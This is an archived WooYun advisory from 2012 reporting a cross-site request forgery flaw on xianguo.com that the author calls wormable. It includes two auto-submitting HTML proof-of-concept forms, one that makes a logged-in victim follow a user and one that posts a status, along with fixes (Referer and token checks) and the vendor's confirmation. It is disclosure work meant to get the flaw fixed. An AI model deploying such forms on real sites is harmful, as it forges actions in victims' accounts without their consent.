当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012568

漏洞标题:鲜果网某处CSRF漏洞可蔓延蠕虫

相关厂商:鲜果网

漏洞作者: imlonghao

提交时间:2012-09-23 00:05

修复时间:2012-11-07 00:06

公开时间:2012-11-07 00:06

漏洞类型:CSRF

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-23: 细节已通知厂商并且等待厂商处理中
2012-09-23: 厂商已经确认,细节仅向厂商公开
2012-10-03: 细节向核心白帽子及相关领域专家公开
2012-10-13: 细节向普通白帽子公开
2012-10-23: 细节向实习白帽子公开
2012-11-07: 细节向公众公开

简要描述:

鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!

详细说明:

在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。
演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用户名/密码:imlonghao)
登录状态下访问,会自动发一条名为Hello World的微博,并会关注一个用户。

漏洞证明:

【加关注】
漏洞地址:http://xianguo.com/beings/follow

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">
<input type="text" name="beingsIds" value="1378148" />
<input type="text" name="parentId" value="0" />
<input type="text" name="ftype" value="0" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


接口返回信息


效果


【发文字】
漏洞地址:http://xianguo.com/doings/addblog

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://xianguo.com/doings/addblog" method="post">
<input type="text" name="title" value="" />
<input type="text" name="tag-input" value="" />
<input type="text" name="tags" value="%5B%5D" />
<input type="text" name="editorValue" value="&#60;&#112;&#62;&#72;&#101;&#108;&#108;&#111;&#32;&#87;&#111;&#114;&#108;&#100;&#33;&#60;&#98;&#114;&#62;&#60;&#47;&#112;&#62;" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


接口返回信息



效果

修复方案:

检查POST来路Referer
在POST的信息中加token

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2012-09-23 00:26

厂商回复:

非常感谢@imlonghao,我们会尽快处理。请多支持:)

最新状态:

暂无